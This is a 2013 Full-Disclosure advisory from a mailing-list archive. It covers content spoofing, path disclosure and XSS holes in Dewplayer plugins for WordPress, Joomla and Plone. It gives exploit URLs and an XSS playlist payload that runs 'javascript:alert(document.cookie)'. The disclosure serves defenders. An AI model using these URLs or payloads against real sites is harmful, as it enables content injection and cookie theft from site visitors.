lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <008401cf025d$9aa93bf0$9b7a6fd5@pc> Date: Thu, 26 Dec 2013 19:11:09 +0200 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk> Subject: Vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer Hello list! These are Content Spoofing and Cross-Site Scripting vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer. Earlier I wrote about vulnerabilities in Dewplayer (http://seclists.org/fulldisclosure/2013/Dec/192). This is media player, which is used at thousands web sites and in multiple web applications. There are near 422 000 web sites with dewplayer.swf in Google's index. And it's just one file name and there are other file names of this player (such as dewplayer-en.swf and others). This flash media player is used in the next plugins: Dewplayer WordPress plugin, JosDewplayer and mosdewplayer for Joomla and collective.dewplayer for Plone. Also there can be other plugins with Dewplayer. ------------------------- Affected products: ------------------------- Vulnerable are the next web applications: Dewplayer WordPress plugin 1.2 and previous versions, JosDewplayer 2.0 and previous versions, all versions of mosdewplayer, collective.dewplayer 1.2 and previous versions. Vulnerable are web applications which are using Dewplayer 2.2.2 and previous versions. ------------------------- Affected vendors: ------------------------- Plugins for different CMS with Dewplayer: http://wordpress.org/extend/plugins/dewplayer-flash-mp3-player/ http://extensions.joomla.org/extensions/multimedia/audio-players-a-gallery/4779 http://plone.org/products/collective.dewplayer ---------- Details: ---------- These are examples of some vulnerabilities in Dewplayer, examples of all СS and XSS vulnerabilities see in above-mentioned advisory. Dewplayer for WordPress: Plugin contains the next flash-files: dewplayer.swf, dewplayer-mini.swf, dewplayer-multi.swf. All of them have CS holes. Content Spoofing (Content Injection) (WASC-12): http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?mp3=1.mp3 http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?file=1.mp3 http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?sound=1.mp3 http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?son=1.mp3 Full path disclosure (WASC-13): http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.php JosDewplayer and mosdewplayer: Plugin JosDewplayer is based on mosdewplayer, so holes must be similar in them. Plugin contains the next flash-files: dewplayer.swf, dewplayer-multi.swf, dewplayer-playlist.swf, dewplayer-rect.swf. All of them have CS holes. http://site/plugins/content/josdewplayer/dewplayer.swf collective.dewplayer: Plugin contains the next flash-files: dewplayer-mini.swf, dewplayer.swf, dewplayer-multi.swf, dewplayer-rect.swf, dewplayer-playlist.swf, dewplayer-bubble.swf, dewplayer-vinyl.swf. All of these flash-files have CS holes and dewplayer-vinyl.swf also has XSS holes. The path at web site can be different: http://site/files/++resource++collective.dewplayer/dewplayer.swf Content Spoofing (Content Injection) (WASC-12): http://site/path/dewplayer.swf?mp3=1.mp3 XSS (WASC-08): http://site/path/dewplayer-vinyl.swf?xml=xss.xml xss.xml <playlist version="1"> <trackList> <track> <location>javascript:alert(document.cookie)</location> <title>XSS</title> </track> </trackList> </playlist> ------------ Timeline: ------------ 2013.10.25 - announced at my site. 2013.10.26 - informed developers. 2013.12.19 - disclosed at my site about Dewplayer. 2013.12.24 - disclosed at my site about plugins (http://websecurity.com.ua/6931/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists